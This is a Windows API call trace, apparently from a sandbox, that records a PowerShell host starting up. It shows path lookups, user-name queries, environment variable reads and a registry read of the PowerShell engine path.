[0081.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.186] SetErrorMode (uMode=0x1) returned 0x1
[0081.186] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.187] SetErrorMode (uMode=0x1) returned 0x1
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.187] SetErrorMode (uMode=0x1) returned 0x1
[0081.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.187] SetErrorMode (uMode=0x1) returned 0x1
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.187] SetErrorMode (uMode=0x1) returned 0x1
[0081.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.187] SetErrorMode (uMode=0x1) returned 0x1
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.187] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.188] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.189] SetErrorMode (uMode=0x1) returned 0x1
[0081.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.189] SetErrorMode (uMode=0x1) returned 0x1
[0081.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.197] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0081.197] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd478 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd478) returned 0x1
[0081.199] CoTaskMemFree (pv=0x1b826f50)
[0081.199] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0081.199] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd4b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd4b8) returned 1
[0081.199] CoTaskMemFree (pv=0x321480)
[0081.200] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ddd860*="Available", lpRawData=0x2ddd5f0) returned 1
[0081.202] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.202] CoTaskMemFree (pv=0x2c7570)
[0081.202] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.202] CoTaskMemFree (pv=0x2c7570)
[0081.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.221] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.221] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0081.221] CoTaskMemFree (pv=0x2c7570)
[0081.221] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.221] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0081.221] CoTaskMemFree (pv=0x2c7570)
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.223] GetCurrentProcessId () returned 0x968
[0081.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd498 | out: phkResult=0xcd498*=0x300) returned 0x0
[0081.225] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd41c, lpData=0x0, lpcbData=0xcd418*=0x0 | out: lpType=0xcd41c*=0x1, lpData=0x0, lpcbData=0xcd418*=0x56) returned 0x0
[0081.226] CoTaskMemAlloc (cb=0x5a) returned 0x302460
[0081.226] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ec, lpData=0x302460, lpcbData=0xcd3e8*=0x56 | out: lpType=0xcd3ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd3e8*=0x56) returned 0x0
[0081.226] CoTaskMemFree (pv=0x302460)
[0081.226] RegCloseKey (hKey=0x300) returned 0x0
[0081.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.283] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.283] CoTaskMemFree (pv=0x2c7570)
[0081.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
